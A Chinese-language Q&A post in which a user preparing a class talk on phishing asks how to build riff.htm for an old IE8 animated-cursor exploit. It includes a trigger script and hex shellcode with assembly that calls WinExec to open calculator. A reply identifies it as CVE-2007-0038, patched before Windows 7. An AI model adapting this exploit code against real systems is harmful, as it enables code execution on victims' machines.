我将在我的课堂上做一个关于网络钓鱼的演讲。我在互联网(https://www.youtube.com/watch?v=iRpKdId5-lE)上找到了一个非常有趣的演示文稿
在Internet Explorer 8上,它应该可以正常工作(WIN 7)。
它应该打开计算器。
在riff.htm中有一个x86汇编十六进制代码,但是他没有显示riff.htm,所以:我应该如何创建riff.htm?
感谢您的帮助!
index.htm:
<script language="javascript">
document.write("<html><body style=\"cursor: url('riff.htm');\"> </body></html>");
wait(500);
window.location.reload();
</script>
应该在riff.htm上:
十六进制:
77d8af0a
90909090
90909090
90909090
90909090
90909090
90909090
90909090
90909090
90909090
2068ec8b
68202020
636c6163
50f8458d
86114db8
90d0ff7c
在x86Assembly中(必须类似):
MOV EBP,ESP
PUSH 20202020
PUSH 636d6163
LEA EAX,DWORD PTR SS:[EBP-8]
PUSH EAX
MOV EAX,kernel32.WinExec
CALL EAX
答案 0 :(得分:1)
在Internet Explorer 8上,它应该可以正常工作(WIN 7)。
您描述的漏洞听起来像CVE-2007-0038。该漏洞是在Windows 7发布前几年修补的-Windows 7系统从未受到影响。
无论如何,尚不清楚这与有关网络钓鱼的演示有何关系。